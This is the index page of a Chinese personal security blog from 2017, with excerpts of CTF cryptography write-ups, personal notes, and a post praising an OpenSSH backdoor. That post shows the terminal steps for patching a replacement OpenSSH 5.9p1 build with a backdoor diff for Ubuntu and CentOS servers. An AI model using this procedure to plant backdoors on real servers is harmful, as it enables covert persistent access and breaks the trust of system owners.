Universe

Nobody is nobody!

Hacking • Reverse • Vulnerability • Security
  • Hacking

    保持一种hacking的思维方式和习惯,不断去尝试、不断去学习、不断去突破。

  • Reverse

    逆向最大的意义就是学会从不同的角度、相反的方向,去看待世界。

  • Vulnerability

    电影《who am i - kein system ist sicher》中有一句话“人类才是最大的漏洞”。

  • Security

    无绝对的安全可言,只是证明不安全所需的成本是不一样的。

Open

rm -rf old_File_Backup

作者: 分类: 随笔杂谈 时间: 2017-06-30 评论: 暂无评论

因为移动硬盘快满了,刚刚在整理一些Old Files,看到很多东西,想想这些都是初中的时候收集的,那时候如饥似渴,虽然毛也不懂(真的是毛也不懂,也学不太会),但是就是喜欢收集,喜欢去发现新的东西,特别是编程方面,那会收集了非常多。

看看大部分的文件

oldFileBackup

阅读全文»

Openssh后门 - Ubuntu/Centos

作者: 分类: *nix,Security 时间: 2017-06-26 评论: 暂无评论

这个后门真的好用...网上流传的都是Centos的版本,因为场景不同,我研究了一下针对Ubuntu,大同小异。

我的理解是在服务器在装一个不同版本的Openssh,打上相应的Patch使其能正常运作。

两个文件我存起来了:

openssh-5.9p1.tar.gz

openssh-5.9p1.patch.tar.gz

root:openssh-5.9p1/ # ssh -V                                                             [15:52:04]
OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8, OpenSSL 1.0.1f 6 Jan 2014
root:~/ # ls                                                                             [15:52:24]
openssh-5.9p1.patch.tar.gz  openssh-5.9p1.tar.gz
root:~/ # tar zxf openssh-5.9p1.patch.tar.gz                                             [15:52:27]
root:~/ # tar zxf openssh-5.9p1.tar.gz                                                   [15:52:36]
root:~/ # ls                                                                             [15:52:41]
openssh-5.9p1  openssh-5.9p1.patch  openssh-5.9p1.patch.tar.gz  openssh-5.9p1.tar.gz
root:~/ # cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/                          [15:52:44]
root:~/ # cd openssh-5.9p1                                                               [15:53:01]
root:openssh-5.9p1/ # patch < sshbd5.9p1.diff                                            [15:53:29]
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h
root:openssh-5.9p1/ #

阅读全文»

python-rsa签名伪造漏洞(CVE-2016-1494)

作者: 分类: CTF,Python,Security 时间: 2017-05-22 评论: 1条评论

此次也是因为在RCTF里遇到了两道RSA的题目,才因此去研究python-rsa签名伪造漏洞这东西,过程曲折,但是也挺有趣,记录下来和大伙儿分享一下。

此次成果也是站在前人的肩膀上去研究的,参考文章的链接在底下都有,大家可移步过去看看(对于原理的剖析,那几篇文章讲的很好)。

0x00 Python-RSA签名伪造漏洞原理

首先,RSA是非对称加密算法,也就是说RSA存在公私钥,RSA可用于数据加密传输(传输对称加密的密钥),也可以进行数字签名,两者区别在于:

RSA用于加密时:
    公钥加密,私钥解密
RSA用于数字签名时:
    私钥加密,公钥解密

如果还不理解可以花三分钟看这里《数字签名是什么?》

RSA

阅读全文»

忙啥呢

作者: 分类: 随笔杂谈 时间: 2017-05-13 评论: 暂无评论

我好像不是很喜欢别人问我最近忙不忙这个问题,因为我实在不知道要怎么回答,说不忙不对,说忙的话别人一问忙啥我也说不出个具体的所以然。我还是比较喜欢“最近我过得很充实”这样的说法。

快有个把月没有写点什么了,有挺多干货,就是因为一些原因(或许是懒?)没有写成文章出来,也可能是日子过得太快,快得我没反应过来就是一个月了。

这个月来最大的收获还是墨麒麟安全实验室的成立,遇到了WyAtu,王小巃,daiker...这些人,几个人也是各种扯皮,各种互相交流,一起学习,共同进步。墨麒麟安全实验室正在不断发展,希望能发展的更好,喜欢这种氛围,我们有过气的网红,有段子手,有复读机,托福小王子,还有老司机等等等等。

现在墨麒麟安全实验室的一个开源项目MoKirinAWD也正在进行中,敬请期待把,哈哈。

除此之外,最近也在找实习,在渗透,在做项目,在学习,在积累,驾照也到手了,两证在手,很老司机。

可能最近就是这么活过来了,王小巃(不让叫王哥..)说我这个团队的常务委员很忙,好像也没毛病,毕竟虽然这个是我的兴趣,我喜欢的东西,但是并不是我生活的全部,单单这个就占了生活中的大部分时间,其他时间还要处理很多事情呢。毕竟还要多和别人接触,交流,交际;去游泳,出去玩,自驾游,玩玩游戏娱乐下;也要思考人生的嘛。

所以,好像除了某些时段以外,我就是这种“劳苦命”,不休停,折腾到底。

可能,因为年轻吧?风狂春不管 :)

对了,后天母亲节了,在老妈看不到的这里,先给老妈来个节日快乐,这些年辛苦你了,接下去就看我的了。

CFB重放攻击

作者: 分类: CTF,Programming 时间: 2017-04-17 评论: 2条评论

http://cstc.xatu.cn/ - web300 - amdin
www.tar.gz

0x00 摸下套路

先把源码down下来,查看下大概逻辑如下:

1. index.php五个功能:home, register, login, manage, logout
2. encrypt.php实现RIJNDAEL_128(CFB)加解密
3. backup.txt存有flag.txt里存放的内容加密后的字符串
4. key.php里得到的identify和key我们没办法知道

刚看到的时候一下子想起了之前搞过的那个CBC字节反转攻击,但是细看后才发现并不是,CFB的,而且一些限制条件($md5),没办法简单的反转攻击。

看接下来实操部分之前,先了解清楚分组加密模式以及本次遇到的CFB的工作方式:分组密码工作模式 - 维基百科

阅读全文»

Top ↑